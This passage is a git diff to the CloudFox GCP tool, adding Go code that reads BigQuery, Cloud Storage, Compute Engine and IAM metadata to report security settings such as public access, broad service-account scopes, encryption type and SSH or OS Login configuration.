for _, a := range access { + if a == nil { + continue + } + + entry := AccessEntry{ + Role: string(a.Role), + EntityType: entityTypeToString(a.EntityType), + Entity: a.Entity, + } + + // Check for special access (views, routines, datasets) + if a.View != nil { + entry.EntityType = "View" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.View.ProjectID, a.View.DatasetID, a.View.TableID) + } + if a.Routine != nil { + entry.EntityType = "Routine" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.Routine.ProjectID, a.Routine.DatasetID, a.Routine.RoutineID) + } + if a.Dataset != nil { + entry.EntityType = "Dataset" + entry.Entity = fmt.Sprintf("%s.%s", a.Dataset.Dataset.ProjectID, a.Dataset.Dataset.DatasetID) + } + + // Check for public access + if a.EntityType == bigquery.SpecialGroupEntity { + if a.Entity == "allUsers" || strings.Contains(strings.ToLower(a.Entity), "allusers") { + hasAllUsers = true + isPublic = true + } + if a.Entity == "allAuthenticatedUsers" || strings.Contains(strings.ToLower(a.Entity), "allauthenticatedusers") { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + + entries = append(entries, entry) + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return entries, isPublic, publicAccess +} + +// entityTypeToString converts BigQuery EntityType to a readable string +func entityTypeToString(et bigquery.EntityType) string { + switch et { + case bigquery.DomainEntity: + return "Domain" + case bigquery.GroupEmailEntity: + return "Group" + case bigquery.UserEmailEntity: + return "User" + case bigquery.SpecialGroupEntity: + return "SpecialGroup" + case bigquery.ViewEntity: + return "View" + case bigquery.IAMMemberEntity: + return "IAMMember" + case bigquery.RoutineEntity: + return "Routine" + case bigquery.DatasetEntity: + return "Dataset" + default: + return "Unknown" + } +} + // BigqueryTables retrieves tables from the given projectID and dataset across all locations func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([]BigqueryTable, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { return nil, err } @@ -135,16 +317,112 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ if err != nil { return nil, err } - tables = append(tables, BigqueryTable{ - TableID: table.TableID, - DatasetID: datasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - NumBytes: meta.NumBytes, - Description: meta.Description, - ProjectID: projectID, - }) + + tbl := BigqueryTable{ + TableID: table.TableID, + DatasetID: datasetID, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + Description: meta.Description, + TableType: tableTypeToString(meta.Type), + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + ExpirationTime: meta.ExpirationTime, + NumBytes: meta.NumBytes, + NumLongTermBytes: meta.NumLongTermBytes, + NumRows: meta.NumRows, + Labels: meta.Labels, + RequirePartitionFilter: meta.RequirePartitionFilter, + } + + // Parse encryption + if meta.EncryptionConfig != nil && meta.EncryptionConfig.KMSKeyName != "" { + tbl.EncryptionType = "CMEK" + tbl.KMSKeyName = meta.EncryptionConfig.KMSKeyName + } else { + tbl.EncryptionType = "Google-managed" + } + + // Parse partitioning + if meta.TimePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "TIME" + } else if meta.RangePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "RANGE" + } + + // Parse view info + if meta.ViewQuery != "" { + tbl.IsView = true + tbl.ViewQuery = meta.ViewQuery + tbl.UseLegacySQL = meta.UseLegacySQL + } + + // Check for streaming buffer + if meta.StreamingBuffer != nil { + tbl.HasStreamingBuffer = true + } + + tables = append(tables, tbl) } return tables, nil } + +// tableTypeToString converts BigQuery TableType to a readable string +func tableTypeToString(tt bigquery.TableType) string { + switch tt { + case bigquery.RegularTable: + return "TABLE" + case bigquery.ViewTable: + return "VIEW" + case bigquery.ExternalTable: + return "EXTERNAL" + case bigquery.MaterializedView: + return "MATERIALIZED_VIEW" + case bigquery.Snapshot: + return "SNAPSHOT" + default: + return "UNKNOWN" + } +} + +// GetMemberType extracts the member type from entity info +func GetMemberType(entityType string, entity string) string { + switch entityType { + case "User": + return "User" + case "Group": + return "Group" + case "Domain": + return "Domain" + case "SpecialGroup": + if strings.Contains(strings.ToLower(entity), "allusers") { + return "PUBLIC" + } + if strings.Contains(strings.ToLower(entity), "allauthenticatedusers") { + return "ALL_AUTHENTICATED" + } + return "SpecialGroup" + case "IAMMember": + if strings.HasPrefix(entity, "serviceAccount:") { + return "ServiceAccount" + } + if strings.HasPrefix(entity, "user:") { + return "User" + } + if strings.HasPrefix(entity, "group:") { + return "Group" + } + return "IAMMember" + case "View": + return "AuthorizedView" + case "Routine": + return "AuthorizedRoutine" + case "Dataset": + return "AuthorizedDataset" + default: + return "Unknown" + } +} diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index c91f071a..e7d51b6c 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -3,38 +3,92 @@ package cloudstorageservice import ( "context" "fmt" + "strings" + "time" + "cloud.google.com/go/iam" "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" + "google.golang.org/api/option" + storageapi "google.golang.org/api/storage/v1" ) type CloudStorageService struct { - // DataStoreService datastoreservice.DataStoreService + client *storage.Client + session *gcpinternal.SafeSession } +// New creates a new CloudStorageService (legacy - uses ADC directly) func New() *CloudStorageService { return &CloudStorageService{} } -// type ObjectInfo struct { -// ObjectName string `json:"objecttName"` -// ObjectSizeBytes float64 `json:"objectSizeBytes"` -// IsPublic bool `json:"isPublic"` -// } +// NewWithSession creates a CloudStorageService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudStorageService { + return &CloudStorageService{session: session} +} + +// NewWithClient creates a CloudStorageService with an existing client (for reuse) +func NewWithClient(client *storage.Client) *CloudStorageService { + return &CloudStorageService{client: client} +} +// IAMBinding represents a single IAM binding on a bucket +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// BucketInfo contains bucket metadata and security-relevant configuration type BucketInfo struct { + // Basic info Name string `json:"name"` Location string `json:"location"` ProjectID string `json:"projectID"` + + // Security-relevant fields + PublicAccessPrevention string `json:"publicAccessPrevention"` // "enforced", "inherited", or "unspecified" + UniformBucketLevelAccess bool `json:"uniformBucketLevelAccess"` // true = IAM only, no ACLs + VersioningEnabled bool `json:"versioningEnabled"` // Object versioning + RequesterPays bool `json:"requesterPays"` // Requester pays enabled + DefaultEventBasedHold bool `json:"defaultEventBasedHold"` // Event-based hold on new objects + LoggingEnabled bool `json:"loggingEnabled"` // Access logging enabled + LogBucket string `json:"logBucket"` // Destination bucket for logs + EncryptionType string `json:"encryptionType"` // "Google-managed", "CMEK", or "CSEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + RetentionPolicyEnabled bool `json:"retentionPolicyEnabled"` // Retention policy set + RetentionPeriodDays int64 `json:"retentionPeriodDays"` // Retention period in days + RetentionPolicyLocked bool `json:"retentionPolicyLocked"` // Retention policy is locked (immutable) + SoftDeleteEnabled bool `json:"softDeleteEnabled"` // Soft delete policy enabled + SoftDeleteRetentionDays int64 `json:"softDeleteRetentionDays"` // Soft delete retention in days + StorageClass string `json:"storageClass"` // Default storage class + AutoclassEnabled bool `json:"autoclassEnabled"` // Autoclass feature enabled + AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass + + // Public access indicators + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` // IAM policy bindings on the bucket + + // Timestamps + Created string `json:"created"` + Updated string `json:"updated"` } func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { ctx := context.Background() - client, err := storage.NewClient(ctx) + + // Get or create client + client, closeClient, err := cs.getClient(ctx) if err != nil { - return nil, fmt.Errorf("Failed to create client: %v", err) + return nil, err + } + if closeClient { + defer client.Close() } - defer client.Close() var buckets []BucketInfo bucketIterator := client.Buckets(ctx, projectID) @@ -46,72 +100,239 @@ func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { if err != nil { return nil, err } - bucket := BucketInfo{Name: battrs.Name, Location: battrs.Location, ProjectID: projectID} + + bucket := BucketInfo{ + Name: battrs.Name, + Location: battrs.Location, + ProjectID: projectID, + } + + // Security fields + bucket.PublicAccessPrevention = publicAccessPreventionToString(battrs.PublicAccessPrevention) + bucket.UniformBucketLevelAccess = battrs.UniformBucketLevelAccess.Enabled + bucket.VersioningEnabled = battrs.VersioningEnabled + bucket.RequesterPays = battrs.RequesterPays + bucket.DefaultEventBasedHold = battrs.DefaultEventBasedHold + bucket.StorageClass = battrs.StorageClass + + // Logging + if battrs.Logging != nil { + bucket.LoggingEnabled = battrs.Logging.LogBucket != "" + bucket.LogBucket = battrs.Logging.LogBucket + } + + // Encryption + if battrs.Encryption != nil && battrs.Encryption.DefaultKMSKeyName != "" { + bucket.EncryptionType = "CMEK" + bucket.KMSKeyName = battrs.Encryption.DefaultKMSKeyName + } else { + bucket.EncryptionType = "Google-managed" + } + + // Retention Policy + if battrs.RetentionPolicy != nil { + bucket.RetentionPolicyEnabled = true + bucket.RetentionPeriodDays = int64(battrs.RetentionPolicy.RetentionPeriod.Hours() / 24) + bucket.RetentionPolicyLocked = battrs.RetentionPolicy.IsLocked + } + + // Autoclass + if battrs.Autoclass != nil && battrs.Autoclass.Enabled { + bucket.AutoclassEnabled = true + bucket.AutoclassTerminalClass = battrs.Autoclass.TerminalStorageClass + } + + // Timestamps + if !battrs.Created.IsZero() { + bucket.Created = battrs.Created.Format("2006-01-02") + } + + // Get additional fields via REST API (SoftDeletePolicy, Updated) + cs.enrichBucketFromRestAPI(ctx, &bucket) + + // Get IAM policy for the bucket + iamBindings, isPublic, publicAccess := cs.getBucketIAMPolicy(ctx, client, battrs.Name) + bucket.IAMBindings = iamBindings + bucket.IsPublic = isPublic + bucket.PublicAccess = publicAccess + buckets = append(buckets, bucket) } return buckets, nil } -// func (cs *CloudStorageService) BucketsWithMetaData(projectID string) (map[string][]BucketInfo, error) { -// buckets, _ := cs.Buckets(projectID) -// bucketInfos := make(map[string][]BucketInfo) -// ctx := context.Background() -// client, err := storage.NewClient(ctx) -// if err != nil { -// return nil, fmt.Errorf("Failed to create client: %v", err) -// } -// for { -// bucketAttrs, err := buckets.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list buckets: %v", err) -// } - -// bucketName := bucketAttrs.Name -// log.Printf("Working on bucket %s", bucketName) - -// // List all objects in the bucket and calculate total size -// totalSize := int64(0) -// var objects []ObjectInfo -// it := client.Bucket(bucketName).Objects(ctx, nil) -// for { -// objectAttrs, err := it.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list objects in bucket %s: %v", bucketName, err) -// } - -// // Get size -// objectSize := objectAttrs.Size -// totalSize += objectSize - -// // Check if public -// isPublic := false -// for _, rule := range objectAttrs.ACL { -// if rule.Entity == storage.AllUsers { -// isPublic = true -// break -// } -// } - -// objects = append(objects, ObjectInfo{ObjectName: objectAttrs.Name, ObjectSizeBytes: float64(objectSize), IsPublic: isPublic}) - -// if totalSize > 3221225472 { // 3 GiB in bytes -// log.Printf("%s bucket is over 3 GiB. Skipping remaining objects in this bucket...", bucketName) -// break -// } -// } -// bucketSizeMB := float64(totalSize) / 1024 / 1024 -// bucketInfos[projectID] = append(bucketInfos[projectID], BucketInfo{BucketName: bucketName, BucketSizeMB: bucketSizeMB, Objects: objects}) -// } -// log.Printf("Sorting resulting list of buckets in descending order %s", projectID) -// sort.Slice(bucketInfos[projectID], func(i, j int) bool { -// return bucketInfos[projectID][i].BucketSizeMB > bucketInfos[projectID][j].BucketSizeMB -// }) - -// return bucketInfos, nil -// } +// getClient returns a storage client, using session if available +// Returns the client, whether to close it, and any error +func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, bool, error) { + // If we have an existing client, use it + if cs.client != nil { + return cs.client, false, nil + } + + // If we have a session, use its token source + if cs.session != nil { + client, err := storage.NewClient(ctx, cs.session.GetClientOption()) + if err != nil { + return nil, false, fmt.Errorf("failed to create client with session: %v", err) + } + return client, true, nil + } + + // Fall back to ADC + client, err := storage.NewClient(ctx) + if err != nil { + return nil, false, fmt.Errorf("failed to create client: %v", err) + } + return client, true, nil +} + +// getClientOption returns the appropriate client option based on session +func (cs *CloudStorageService) getClientOption() option.ClientOption { + if cs.session != nil { + return cs.session.GetClientOption() + } + return nil +} + +// getBucketIAMPolicy retrieves the IAM policy for a bucket and checks for public access +func (cs *CloudStorageService) getBucketIAMPolicy(ctx context.Context, client *storage.Client, bucketName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + policy, err := client.Bucket(bucketName).IAM().Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + + // Check for public access + if member == string(iam.AllUsers) { + hasAllUsers = true + isPublic = true + } + if member == string(iam.AllAuthenticatedUsers) { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + bindings = append(bindings, binding) + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// GetBucketIAMPolicyOnly retrieves just the IAM policy for a specific bucket +func (cs *CloudStorageService) GetBucketIAMPolicyOnly(bucketName string) ([]IAMBinding, error) { + ctx := context.Background() + + client, closeClient, err := cs.getClient(ctx) + if err != nil { + return nil, err + } + if closeClient { + defer client.Close() + } + + bindings, _, _ := cs.getBucketIAMPolicy(ctx, client, bucketName) + return bindings, nil +} + +// publicAccessPreventionToString converts the PublicAccessPrevention type to a readable string +func publicAccessPreventionToString(pap storage.PublicAccessPrevention) string { + switch pap { + case storage.PublicAccessPreventionEnforced: + return "enforced" + case storage.PublicAccessPreventionInherited: + return "inherited" + default: + return "unspecified" + } +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// enrichBucketFromRestAPI fetches additional bucket fields via the REST API +// that may not be available in the Go SDK version +func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, bucket *BucketInfo) { + var service *storageapi.Service + var err error + + // Use session if available + if cs.session != nil { + service, err = storageapi.NewService(ctx, cs.session.GetClientOption()) + } else { + service, err = storageapi.NewService(ctx) + } + + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Get bucket details via REST API + restBucket, err := service.Buckets.Get(bucket.Name).Context(ctx).Do() + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Parse SoftDeletePolicy + if restBucket.SoftDeletePolicy != nil { + if restBucket.SoftDeletePolicy.RetentionDurationSeconds > 0 { + bucket.SoftDeleteEnabled = true + bucket.SoftDeleteRetentionDays = restBucket.SoftDeletePolicy.RetentionDurationSeconds / 86400 // seconds to days + } + } + + // Parse Updated timestamp + if restBucket.Updated != "" { + // REST API returns RFC3339 format + if t, err := time.Parse(time.RFC3339, restBucket.Updated); err == nil { + bucket.Updated = t.Format("2006-01-02") + } + } +} diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index bcff7739..bb87fe77 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -5,34 +5,92 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/compute/v1" ) type ComputeEngineService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new ComputeEngineService (legacy - uses ADC directly) func New() *ComputeEngineService { return &ComputeEngineService{} } +// NewWithSession creates a ComputeEngineService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *ComputeEngineService { + return &ComputeEngineService{session: session} +} + +// ServiceAccountInfo contains service account details for an instance +type ServiceAccountInfo struct { + Email string `json:"email"` + Scopes []string `json:"scopes"` +} + +// ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { - Name string - ID string - Zone string - State string - ExternalIP string - InternalIP string - ServiceAccounts []*compute.ServiceAccount // Assuming role is derived from service accounts - NetworkInterfaces []*compute.NetworkInterface - Tags *compute.Tags - ProjectID string + // Basic info + Name string `json:"name"` + ID string `json:"id"` + Zone string `json:"zone"` + State string `json:"state"` + ProjectID string `json:"projectID"` + + // Network configuration + ExternalIP string `json:"externalIP"` + InternalIP string `json:"internalIP"` + NetworkInterfaces []*compute.NetworkInterface `json:"networkInterfaces"` + CanIPForward bool `json:"canIpForward"` // Can forward packets (router/NAT) + + // Service accounts and scopes + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + HasDefaultSA bool `json:"hasDefaultSA"` // Uses default compute SA + HasCloudScopes bool `json:"hasCloudScopes"` // Has cloud-platform or other broad scopes + + // Security configuration + DeletionProtection bool `json:"deletionProtection"` // Protected against deletion + ShieldedVM bool `json:"shieldedVM"` // Shielded VM enabled + SecureBoot bool `json:"secureBoot"` // Secure Boot enabled + VTPMEnabled bool `json:"vtpmEnabled"` // vTPM enabled + IntegrityMonitoring bool `json:"integrityMonitoring"` // Integrity monitoring enabled + ConfidentialVM bool `json:"confidentialVM"` // Confidential computing enabled + + // Instance metadata + MachineType string `json:"machineType"` + Tags *compute.Tags `json:"tags"` + Labels map[string]string `json:"labels"` + + // Metadata security + HasStartupScript bool `json:"hasStartupScript"` // Has startup script in metadata + HasSSHKeys bool `json:"hasSSHKeys"` // Has SSH keys in metadata + BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` // Blocks project-wide SSH keys + OSLoginEnabled bool `json:"osLoginEnabled"` // OS Login enabled + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` // OS Login 2FA enabled + SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled + + // Disk encryption + BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" + BootDiskKMSKey string `json:"bootDiskKMSKey"` // KMS key for CMEK + + // Timestamps + CreationTimestamp string `json:"creationTimestamp"` + LastStartTimestamp string `json:"lastStartTimestamp"` +} + +// getService returns a compute service, using session if available +func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { + if ces.session != nil { + return compute.NewService(ctx, ces.session.GetClientOption()) + } + return compute.NewService(ctx) } // Retrieves instances from all regions and zones for a project without using concurrency. func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + computeService, err := ces.getService(ctx) if err != nil { return nil, err } @@ -52,17 +110,50 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf } for _, instance := range instanceList.Items { info := ComputeEngineInfo{ - Name: instance.Name, - ID: fmt.Sprintf("%v", instance.Id), - Zone: zoneURL, - State: instance.Status, - ExternalIP: getExternalIP(instance), - InternalIP: getInternalIP(instance), - ServiceAccounts: instance.ServiceAccounts, - NetworkInterfaces: instance.NetworkInterfaces, - Tags: instance.Tags, - ProjectID: projectID, + Name: instance.Name, + ID: fmt.Sprintf("%v", instance.Id), + Zone: zone, + State: instance.Status, + ExternalIP: getExternalIP(instance), + InternalIP: getInternalIP(instance), + NetworkInterfaces: instance.NetworkInterfaces, + CanIPForward: instance.CanIpForward, + Tags: instance.Tags, + Labels: instance.Labels, + ProjectID: projectID, + DeletionProtection: instance.DeletionProtection, + CreationTimestamp: instance.CreationTimestamp, + LastStartTimestamp: instance.LastStartTimestamp, } + + // Parse machine type (extract just the type name) + info.MachineType = getMachineTypeName(instance.MachineType) + + // Parse service accounts and scopes + info.ServiceAccounts, info.HasDefaultSA, info.HasCloudScopes = parseServiceAccounts(instance.ServiceAccounts, projectID) + + // Parse shielded VM config + if instance.ShieldedInstanceConfig != nil { + info.ShieldedVM = true + info.SecureBoot = instance.ShieldedInstanceConfig.EnableSecureBoot + info.VTPMEnabled = instance.ShieldedInstanceConfig.EnableVtpm + info.IntegrityMonitoring = instance.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + + // Parse confidential VM config + if instance.ConfidentialInstanceConfig != nil { + info.ConfidentialVM = instance.ConfidentialInstanceConfig.EnableConfidentialCompute + } + + // Parse metadata for security-relevant items + if instance.Metadata != nil { + info.HasStartupScript, info.HasSSHKeys, info.BlockProjectSSHKeys, + info.OSLoginEnabled, info.OSLogin2FAEnabled, info.SerialPortEnabled = parseMetadata(instance.Metadata) + } + + // Parse boot disk encryption + info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + instanceInfos = append(instanceInfos, info) } } @@ -96,4 +187,125 @@ func getInternalIP(instance *compute.Instance) string { return "" } -// TODO consider just getting the emails of the service account and returning a []string +// getMachineTypeName extracts the machine type name from a full URL +func getMachineTypeName(machineTypeURL string) string { + parts := strings.Split(machineTypeURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return machineTypeURL +} + +// parseServiceAccounts extracts service account info and checks for security concerns +func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]ServiceAccountInfo, bool, bool) { + var accounts []ServiceAccountInfo + hasDefaultSA := false + hasCloudScopes := false + + defaultSAPattern := fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectID) + + for _, sa := range sas { + info := ServiceAccountInfo{ + Email: sa.Email, + Scopes: sa.Scopes, + } + accounts = append(accounts, info) + + // Check if using default compute service account + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") || + strings.HasSuffix(sa.Email, defaultSAPattern) { + hasDefaultSA = true + } + + // Check for broad scopes + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" || + scope == "https://www.googleapis.com/auth/compute" || + scope == "https://www.googleapis.com/auth/devstorage.full_control" || + scope == "https://www.googleapis.com/auth/devstorage.read_write" { + hasCloudScopes = true + } + } + } + + return accounts, hasDefaultSA, hasCloudScopes +} + +// parseMetadata checks instance metadata for security-relevant settings +func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, blockProjectSSHKeys, osLoginEnabled, osLogin2FA, serialPortEnabled bool) { + if metadata == nil || metadata.Items == nil { + return + } + + for _, item := range metadata.Items { + if item == nil { + continue + } + + switch item.Key { + case "startup-script", "startup-script-url": + hasStartupScript = true + case "ssh-keys", "sshKeys": + hasSSHKeys = true + case "block-project-ssh-keys": + if item.Value != nil && *item.Value == "true" { + blockProjectSSHKeys = true + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + osLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + osLogin2FA = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + serialPortEnabled = true + } + } + } + + return +} + +// parseBootDiskEncryption checks the boot disk encryption type +func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { + encryptionType = "Google-managed" + + for _, disk := range disks { + if disk == nil || !disk.Boot { + continue + } + + if disk.DiskEncryptionKey != nil { + if disk.DiskEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKey = disk.DiskEncryptionKey.KmsKeyName + } else if disk.DiskEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + break // Only check boot disk + } + + return +} + +// FormatScopes formats service account scopes for display +func FormatScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + // Shorten scope URLs for display + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index bf63c759..1f223b8e 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -4,57 +4,189 @@ import ( "context" "fmt" "strings" + "time" iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudidentity "google.golang.org/api/cloudidentity/v1" + iam "google.golang.org/api/iam/v1" + "google.golang.org/api/option" ) type IAMService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new IAMService (legacy - uses ADC directly) func New() *IAMService { return &IAMService{} } +// NewWithSession creates an IAMService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *IAMService { + return &IAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *IAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + // AncestryResource represents a single resource in the project's ancestry. type AncestryResource struct { Type string `json:"type"` Id string `json:"id"` } +// IAMCondition represents a parsed IAM condition (conditional access policy) +type IAMCondition struct { + Title string `json:"title"` + Description string `json:"description"` + Expression string `json:"expression"` +} + // PolicyBindings represents IAM policy bindings. type PolicyBinding struct { - Role string `json:"role"` - Members []string `json:"members"` - ResourceID string `json:"resourceID"` - ResourceType string - PolicyName string `json:"policyBindings"` - Condition string + Role string `json:"role"` + Members []string `json:"members"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + PolicyName string `json:"policyBindings"` + Condition string `json:"condition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` // Parsed condition details + HasCondition bool `json:"hasCondition"` // True if binding has conditions + IsInherited bool `json:"isInherited"` // True if inherited from folder/org + InheritedFrom string `json:"inheritedFrom"` // Source of inheritance (folder/org ID) } type PrincipalWithRoles struct { - Name string - Type string - PolicyBindings []PolicyBinding - ResourceID string - ResourceType string + Name string `json:"name"` + Type string `json:"type"` + PolicyBindings []PolicyBinding `json:"policyBindings"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + // Enhanced fields + Email string `json:"email"` // Clean email without prefix + DisplayName string `json:"displayName"` // For service accounts + Description string `json:"description"` // For service accounts + Disabled bool `json:"disabled"` // For service accounts + UniqueID string `json:"uniqueId"` // For service accounts + HasKeys bool `json:"hasKeys"` // Service account has user-managed keys + KeyCount int `json:"keyCount"` // Number of user-managed keys + HasCustomRoles bool `json:"hasCustomRoles"` // Has any custom roles assigned + CustomRoles []string `json:"customRoles"` // List of custom role names +} + +// ServiceAccountInfo represents detailed info about a service account +type ServiceAccountInfo struct { + Email string `json:"email"` + Name string `json:"name"` // Full resource name + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Disabled bool `json:"disabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + // Key information + HasKeys bool `json:"hasKeys"` + KeyCount int `json:"keyCount"` + Keys []ServiceAccountKeyInfo `json:"keys"` + // Role information + Roles []string `json:"roles"` + HasCustomRoles bool `json:"hasCustomRoles"` + CustomRoles []string `json:"customRoles"` + HasHighPrivilege bool `json:"hasHighPrivilege"` + HighPrivRoles []string `json:"highPrivRoles"` +} + +// ServiceAccountKeyInfo represents a service account key +type ServiceAccountKeyInfo struct { + Name string `json:"name"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyOrigin string `json:"keyOrigin"` // GOOGLE_PROVIDED or USER_PROVIDED + KeyType string `json:"keyType"` // USER_MANAGED or SYSTEM_MANAGED + ValidAfter time.Time `json:"validAfter"` + ValidBefore time.Time `json:"validBefore"` + Disabled bool `json:"disabled"` +} + +// CustomRole represents a custom IAM role +type CustomRole struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + IncludedPermissions []string `json:"includedPermissions"` + Stage string `json:"stage"` // ALPHA, BETA, GA, DEPRECATED, DISABLED + Deleted bool `json:"deleted"` + Etag string `json:"etag"` + ProjectID string `json:"projectId"` // Empty if org-level + OrgID string `json:"orgId"` // Empty if project-level + IsProjectLevel bool `json:"isProjectLevel"` + PermissionCount int `json:"permissionCount"` +} + +// GroupMember represents a member of a Google Group +type GroupMember struct { + Email string `json:"email"` + Type string `json:"type"` // USER, SERVICE_ACCOUNT, GROUP (nested) + Role string 